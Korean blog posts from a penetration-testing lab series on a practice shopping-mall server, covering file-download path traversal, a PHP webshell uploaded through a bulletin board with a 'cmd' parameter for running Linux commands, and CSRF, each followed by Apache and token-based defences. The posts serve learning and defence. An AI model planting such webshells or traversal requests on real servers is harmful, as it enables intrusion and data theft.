1. 작업 환경 

    - VMware Workstation 17 Player

    - Cent OS 7

    - kali_linux

    - 모의해킹용 쇼핑몰 서버 

    - Burp Suite 

 

2. 파일 다운로드 공격 / 대응 

    - 공격

       file 파라미터에 웹루트 디렉터리내 파일들을 입력하면 다운로드가 됨
       /download.php?file=/var/www/html/index.php

    - 대응 

       /var/www/html/download.php

'모의해킹' 카테고리의 다른 글

데이터 평문 전송 공격 / 대응  (1) 2024.10.15
불충분한 세션 관리 공격 / 대응  (0) 2024.10.15
파일업로드 공격 / 대응  (0) 2024.10.15
CSRF 공격 / 대응  (0) 2024.10.15
XSS 공격 / 대응  (0) 2024.10.15

1. 작업 환경 

    - VMware Workstation 17 Player

    - Cent OS 7

    - kali_linux

    - 모의해킹용 쇼핑몰 서버 

    - Burp Suite 

 

2. 파일업로드 공격 / 대응 

    - 공격

        vi webshell.php
          <?php
          system($_GET['cmd']);
          ?>
        게시판에 webshell.php 첨부 후 글 작성
        webshell.php가 저장된 경로를 찾아서 주소창에 쳐보기

        첨부파일 링크 확인:http://ip주소/download.php?file=/var/www/html/tmp/1718088401@webshell.php

         /var/www/html/tmp/1718088401@webshell.php 가 경로이므로 http://ip주소/tmp/1718088401@webshell.php

         http://ip주소/tmp/1718088401@webshell.php?cmd=리눅스 명령어를 주소창에 치면 동작함

 

    - 대응

        첨부파일의 실제 MIME 타입과 확장자를 모두 검증하기 때문에 웹쉘이 더이상 업로드 되지 않음

 

        첨부파일 디렉토리의 php(서버사이드스크립트)가 실행되지 않도록 설정
         vi /etc/httpd/conf/httpd.conf
           <Directory "/var/www/html/tmp">
            AllowOverrideAll
           </Directory>
        파일업로드 디렉터리에 .htaccess생성
            vi /var/www/html/tmp/.htaccess

        vi /var/www/html/tmp/.htaccess
           <FilesMatch"\.(ph|inc|lib)">
           Order allow,deny
           Deny from all
           </FilesMatch>
        url을 통한 ph, .inc, .lib 파일 직접접근 차단
        systemctl restart httpd        

        첨부파일 디렉터리(/tmp)에 있는 웹쉘 재접근시 403 응답코드 반환

        파일업로드 용량 제한
        vi /etc/httpd/conf/httpd.conf
           <Directory "/var/www/html/tmp">
            AllowOverrideAll
           LimitRequestBody5000000
          </Directory>
        systemctl restart httpd
        5M으로 제한

        5M를 초과하는 크기의 파일을 업로드하면 아래와 같은 413 응답코드 반환

'모의해킹' 카테고리의 다른 글

불충분한 세션 관리 공격 / 대응  (0) 2024.10.15
파일 다운로드 공격 / 대응  (1) 2024.10.15
CSRF 공격 / 대응  (0) 2024.10.15
XSS 공격 / 대응  (0) 2024.10.15
정보누출 공격 / 대응  (0) 2024.10.15

1. 작업 환경 

    - VMware Workstation 17 Player

    - Cent OS 7

    - kali_linux

    - 모의해킹용 쇼핑몰 서버 

    - Burp Suite 

 

2. CSRF 공격 / 대응 

    - 공격

 

         게시물 내용에 아래 스크립트를 줄바꿈 없이 입력하여 삽입 후 저장

 

         해당 게시물을 조회할때 마다 POST 요청이 전송되어 글이 자동으로 작성됨

 

    -  대응 

        CSRF 토큰사용

         ‘write.php’ 요청시,서버에서 CSRF 토큰을 발급하여 세션에 저장 후,클라이언트측에도 전송
         이후 클라이언트는 작성글 ‘저장’ 요청시, 토큰을 함께 서버로 전송
         서버는 전송받은 토큰을 세션에 저장된 토큰과 비교하여 요청의 위조여부를 검증

 

 

         CSRF 토큰에 의해 기존에 작성한 CSRF 공격 게시물을 조회하여도 로그인한 사용자 이름으로 글이 자동 생성되지

            않음
         기존 CSRF공격 게시물에서 CSRF토큰값을 서버로 전송하지 않기에 서버는 위조된 요청으로 간주하여 차단

'모의해킹' 카테고리의 다른 글

파일 다운로드 공격 / 대응  (1) 2024.10.15
파일업로드 공격 / 대응  (0) 2024.10.15
XSS 공격 / 대응  (0) 2024.10.15
정보누출 공격 / 대응  (0) 2024.10.15
모의해킹 컴퓨터 환경 셋팅 : 1. 계획  (2) 2024.10.12

+ Recent posts

# 드래그 금지

티스토리툴바